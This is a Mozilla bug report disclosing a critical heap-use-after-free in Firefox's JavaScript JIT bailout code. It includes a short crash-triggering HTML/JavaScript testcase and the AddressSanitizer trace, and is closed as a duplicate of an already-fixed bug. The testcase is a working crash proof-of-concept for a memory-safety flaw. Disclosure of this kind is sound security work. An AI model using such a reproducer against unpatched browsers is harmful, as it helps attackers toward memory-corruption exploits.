Closed
Bug 1309223
Opened 9 years ago
Closed 9 years ago
heap-use-after-free in BaselineStackBuilder
Categories
(Core :: JavaScript Engine: JIT, defect)
Core
JavaScript Engine: JIT
Tracking
()
RESOLVED
DUPLICATE
of bug 1308556
| Tracking | Status | |
|---|---|---|
| firefox52 | --- | fixed |
People
(Reporter: nils, Unassigned)
Details
(Keywords: csectype-uaf, reporter-external, sec-critical, Whiteboard: [adv-main52-])
Attachments
(1 file)
|
529 bytes,
text/html
|
Details |
The following testcase crashes the latest ASAN build of Firefox (BuildID=20161011100146).
crash.html:
<script>
function f2(r) {
return r+r;
}
function f1(a) {
return f2(a);
}
for(var x=0;x<2000;x++) f1([1]);
f1(undefined,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,
0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead);
</script>
ASAN output:
=================================================================
==12692==ERROR: AddressSanitizer: heap-use-after-free on address 0x619000c0b5e0 at pc 0x7fdedcc557a8 bp 0x7fffa8c70310 sp 0x7fffa8c70308
READ of size 8 at 0x619000c0b5e0 thread T0 (Web Content)
#0 0x7fdedcc557a7 in write<JS::Value> /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:203:9
#1 0x7fdedcc557a7 in writeValue /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:236
#2 0x7fdedcc557a7 in InitFromBailout /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:1279
#3 0x7fdedcc557a7 in js::jit::BailoutIonToBaseline(JSContext*, js::jit::JitActivation*, js::jit::JitFrameIterator&, bool, js::jit::BaselineBailoutInfo**, js::jit::ExceptionBailoutInfo const*) /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:1572
#4 0x7fdedcc3d6bd in js::jit::Bailout(js::jit::BailoutStack*, js::jit::BaselineBailoutInfo**) /home/worker/workspace/build/src/js/src/jit/Bailouts.cpp:55:23
#5 0x7fdec063c48e (<unknown module>)
0x619000c0b5e0 is located 864 bytes inside of 1024-byte region [0x619000c0b280,0x619000c0b680)
freed by thread T0 (Web Content) here:
#0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
#1 0x7fdedcc4e0ae in js_free /home/worker/workspace/build/src/obj-firefox/dist/include/js/Utility.h:257:5
#2 0x7fdedcc4e0ae in enlarge /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:149
#3 0x7fdedcc4e0ae in subtract /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:182
#4 0x7fdedcc4e0ae in write<JS::Value> /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:201
#5 0x7fdedcc4e0ae in writeValue /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:236
#6 0x7fdedcc4e0ae in InitFromBailout /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:1279
#7 0x7fdedcc4e0ae in js::jit::BailoutIonToBaseline(JSContext*, js::jit::JitActivation*, js::jit::JitFrameIterator&, bool, js::jit::BaselineBailoutInfo**, js::jit::ExceptionBailoutInfo const*) /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:1572
#8 0x7fdedcc3d6bd in js::jit::Bailout(js::jit::BailoutStack*, js::jit::BaselineBailoutInfo**) /home/worker/workspace/build/src/js/src/jit/Bailouts.cpp:55:23
#9 0x7fdec063c48e (<unknown module>)
#10 0x7fdec063c887 (<unknown module>)
previously allocated by thread T0 (Web Content) here:
#0 0x4b2604 in calloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66:3
#1 0x7fdedcc4565f in js_calloc /home/worker/workspace/build/src/obj-firefox/dist/include/js/Utility.h:235:12
#2 0x7fdedcc4565f in init /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:117
#3 0x7fdedcc4565f in js::jit::BailoutIonToBaseline(JSContext*, js::jit::JitActivation*, js::jit::JitFrameIterator&, bool, js::jit::BaselineBailoutInfo**, js::jit::ExceptionBailoutInfo const*) /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:1508
#4 0x7fdedcc3d6bd in js::jit::Bailout(js::jit::BailoutStack*, js::jit::BaselineBailoutInfo**) /home/worker/workspace/build/src/js/src/jit/Bailouts.cpp:55:23
#5 0x7fdec063c48e (<unknown module>)
#6 0x7fdec063c887 (<unknown module>)
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:203:9 in write<JS::Value>
Shadow bytes around the buggy address:
0x0c3280179660: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3280179670: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3280179680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3280179690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c32801796a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c32801796b0: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd
0x0c32801796c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c32801796d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c32801796e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c32801796f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3280179700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==12692==ABORTING
|
||
Updated•9 years ago
|
Group: core-security → javascript-core-security
|
|
||
Updated•9 years ago
|
Flags: needinfo?(jdemooij)
Keywords: csectype-uaf,
sec-critical
|
||
Comment 1•9 years ago
|
||
Hi Nils, I think this is a duplicate of bug 1308556. I landed a patch for that a few days ago. Can you confirm this works with the latest ASan builds?
Flags: needinfo?(jdemooij) → needinfo?(nils)
Hi Jan, I can confirm that it doesn't repro with a build from today anymore \o/
Out of interest could you cc me on that bug?
Flags: needinfo?(nils)
|
|
||
Comment 3•9 years ago
|
||
(In reply to Nils from comment #2)
> Hi Jan, I can confirm that it doesn't repro with a build from today anymore
> \o/
Great, thanks.
> Out of interest could you cc me on that bug?
Done.
Status: NEW → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
|
||
Updated•9 years ago
|
Flags: sec-bounty?
|
|
||
Updated•9 years ago
|
Flags: sec-bounty? → sec-bounty-
|
||
Comment 4•8 years ago
|
||
Updating status in 52 per comment 2 and bug 1308556.
|
|
||
Updated•8 years ago
|
Whiteboard: [adv-main52-]
|
|
||
Updated•8 years ago
|
Group: javascript-core-security
|
||
Updated•1 year ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•